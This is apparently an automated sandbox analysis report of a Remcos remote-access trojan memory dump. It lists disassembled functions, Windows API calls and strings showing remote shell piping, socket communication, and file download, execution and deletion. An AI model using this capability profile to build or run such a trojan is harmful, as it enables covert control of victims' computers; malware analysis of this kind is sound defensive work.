                                                          • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                          • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                          • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5 call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 100 40e134-40e154 call 401e8f call 412902 call 4112b5 70->100 85 40d9aa-40d9ac 79->85 80->79 99 40d98e-40d9a4 call 401e8f call 412902 80->99 88 40d9b5-40d9bc 85->88 89 40d9ae-40d9b0 85->89 93 40d9c0-40d9cc call 41a463 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 104 40d9d5-40d9d9 93->104 105 40d9ce-40d9d0 93->105 94->93 99->79 108 40da18-40da2b call 401d64 call 401e8f 104->108 109 40d9db-40d9e2 call 40697b 104->109 105->104 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 120 40d9e4-40d9e9 call 40699d call 4064d0 109->120 121 40d9ee-40da01 call 401d64 call 401e8f 109->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->108 140 40da0b-40da11 138->140 140->108 142 40da13 call 4064d0 140->142 142->108 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 189 40dad7-40dadb call 401d64 164->189 220 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->220 169 40dbb1-40dbbb call 4082d7 166->169 170 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->170 179 40dbc0-40dbe4 call 4022f8 call 4338c8 169->179 170->179 197 40dbf3 179->197 198 40dbe6-40dbf1 call 436050 179->198 199 40dae0-40db1d call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 189->199 203 40dbf5-40dc6a call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 call 4338d1 call 401d64 call 40b125 197->203 198->203 199->163 203->220 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 203->274 272 40dd79-40dd7b 220->272 273 40dd5e 220->273 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->220 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->92 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 342 40def9-40df0c call 401d64 call 401e8f 332->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 332->343 353 40df6c-40df7f call 401d64 call 401e8f 342->353 354 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->354 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 353->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 353->366 354->353 365->366 386 40dfe0 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 395 40e019-40e020 390->395 396 40e00d-40e017 CreateThread 390->396 391->390 398 40e022-40e025 395->398 399 40e033-40e038 395->399 396->395 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 413 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->100 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 437 40e0db-40e0e8 Sleep call 401e07 435->437 437->433
                                                          APIs
                                                            • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                            • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                            • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                            • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                            • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                            • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                            • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000104), ref: 0040D790
                                                            • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                          • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                          • API String ID: 2830904901-1108828230
                                                          • Opcode ID: ec0c27093ae2b25acbc0dbe248f5bcf65095a0b92f5ab25aac08858853d55201
                                                          • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                          • Opcode Fuzzy Hash: ec0c27093ae2b25acbc0dbe248f5bcf65095a0b92f5ab25aac08858853d55201
                                                          • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                          Control-flow Graph

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                          • CloseHandle.KERNELBASE(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                          • closesocket.WS2_32(?), ref: 0040481F
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404856
                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404867
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 0040486E
                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404880
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404885
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040488A
                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404895
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040489A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                          • String ID:
                                                          • API String ID: 3658366068-0
                                                          • Opcode ID: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                          • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                          • Opcode Fuzzy Hash: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                          • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                          Control-flow Graph

                                                          control_flow_graph 464 447210-447224 465 447226-44722f 464->465 466 447231-44724c LoadLibraryExW 464->466 467 447288-44728a 465->467 468 447275-44727b 466->468 469 44724e-447257 GetLastError 466->469 472 447284 468->472 473 44727d-44727e FreeLibrary 468->473 470 447266 469->470 471 447259-447264 LoadLibraryExW 469->471 474 447268-44726a 470->474 471->474 475 447286-447287 472->475 473->472 474->468 476 44726c-447273 474->476 475->467 476->475
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                          • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                          • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                          • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                          • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8

                                                          Control-flow Graph

                                                          control_flow_graph 477 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                          APIs
                                                          • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                          • GetLastError.KERNEL32 ref: 0040BEF1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateErrorLastMutex
                                                          • String ID: (CG
                                                          • API String ID: 1925916568-4210230975
                                                          • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                          • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                          • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                          • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                                                          Control-flow Graph

                                                          control_flow_graph 488 447174-44719e 489 4471a0-4471a2 488->489 490 447209 488->490 491 4471a4-4471a6 489->491 492 4471a8-4471ae 489->492 493 44720b-44720f 490->493 491->493 494 4471b0-4471b2 call 447210 492->494 495 4471ca 492->495 500 4471b7-4471ba 494->500 496 4471cc-4471ce 495->496 498 4471d0-4471de GetProcAddress 496->498 499 4471f9-447207 496->499 501 4471e0-4471e9 call 4333a7 498->501 502 4471f3 498->502 499->490 503 4471bc-4471c2 500->503 504 4471eb-4471f1 500->504 501->491 502->499 503->494 506 4471c4 503->506 504->496 506->495
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004471D4
                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004471E1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                          • String ID:
                                                          • API String ID: 2279764990-0
                                                          • Opcode ID: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                          • Instruction ID: 6f7a2b722a2a1d8c8194c8cb68bd8fc2eac5a8381c6f9e3e6965fab01942ac9c
                                                          • Opcode Fuzzy Hash: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                          • Instruction Fuzzy Hash: 8A110233A041629BFB329F68EC4099B7395AB803747164672FD19AB344DB34EC4386E9

                                                          Control-flow Graph

                                                          control_flow_graph 508 43360d-433610 509 43361f-433622 call 43a88c 508->509 511 433627-43362a 509->511 512 433612-43361d call 442200 511->512 513 43362c-43362d 511->513 512->509 516 43362e-433632 512->516 517 433638-433dec call 433d58 call 437bd7 516->517 518 433ded-433e09 call 433d8b call 437bd7 516->518 517->518
                                                          APIs
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                            • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,1DC,?,00475B70,00473D54,00000000,?,?,?,?,00434431,?,0046D680,?), ref: 00437C37
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3476068407-0
                                                          • Opcode ID: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                          • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                          • Opcode Fuzzy Hash: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                          • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D

                                                          Control-flow Graph

                                                          control_flow_graph 528 44eeb5-44eec2 call 448706 530 44eec7-44eed2 528->530 531 44eed4-44eed6 530->531 532 44eed8-44eee0 530->532 533 44ef20-44ef2e call 446ac5 531->533 532->533 534 44eee2-44eee6 532->534 535 44eee8-44ef1a call 44772e 534->535 540 44ef1c-44ef1f 535->540 540->533
                                                          APIs
                                                            • Part of subcall function 00448706: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F74,00000001,00000364,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448747
                                                          • _free.LIBCMT ref: 0044EF21
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                          • Instruction ID: 91765bf56145836b352927287b0900a7be963fc320189fecf9c5ab0789588b10
                                                          • Opcode Fuzzy Hash: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                          • Instruction Fuzzy Hash: 2D01DB771043056BF321CF66984595AFBD9FB8A370F65051EE59453280EB34A806C778

                                                          Control-flow Graph

                                                          control_flow_graph 541 448706-448711 542 448713-44871d 541->542 543 44871f-448725 541->543 542->543 544 448753-44875e call 445354 542->544 545 448727-448728 543->545 546 44873e-44874f RtlAllocateHeap 543->546 551 448760-448762 544->551 545->546 547 448751 546->547 548 44872a-448731 call 4447c5 546->548 547->551 548->544 554 448733-44873c call 442200 548->554 554->544 554->546
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F74,00000001,00000364,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448747
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                          • Instruction ID: 09342868e9f2d6cc7f7b696f5049c05c0568eaa44df27644d65b9450949fa691
                                                          • Opcode Fuzzy Hash: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                          • Instruction Fuzzy Hash: 9CF0E93250412467BB216A369D55B5F7748AF427B0B34802BFC08EA691DF68DD4182ED

                                                          Control-flow Graph

                                                          control_flow_graph 557 446aff-446b0b 558 446b3d-446b48 call 445354 557->558 559 446b0d-446b0f 557->559 566 446b4a-446b4c 558->566 561 446b11-446b12 559->561 562 446b28-446b39 RtlAllocateHeap 559->562 561->562 563 446b14-446b1b call 4447c5 562->563 564 446b3b 562->564 563->558 569 446b1d-446b26 call 442200 563->569 564->566 569->558 569->562
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                          • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                          • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                          • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF

                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                          • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                            • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                            • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                            • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                            • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                            • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                            • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                            • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                            • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                            • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                            • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                            • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                          • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                            • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                            • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                            • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                          • Sleep.KERNEL32(000007D0), ref: 00407976
                                                          • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                            • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                          • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                          • API String ID: 2918587301-599666313
                                                          • Opcode ID: 837214dce98ca1b2b2073b1697b820e369ac81518af4a92b317c91ee19e5831a
                                                          • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                          • Opcode Fuzzy Hash: 837214dce98ca1b2b2073b1697b820e369ac81518af4a92b317c91ee19e5831a
                                                          • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 0040508E
                                                            • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                            • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          • __Init_thread_footer.LIBCMT ref: 004050CB
                                                          • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                          • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                            • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                            • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                            • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                          • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                          • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                          • CloseHandle.KERNEL32 ref: 004053CD
                                                          • CloseHandle.KERNEL32 ref: 004053D5
                                                          • CloseHandle.KERNEL32 ref: 004053E7
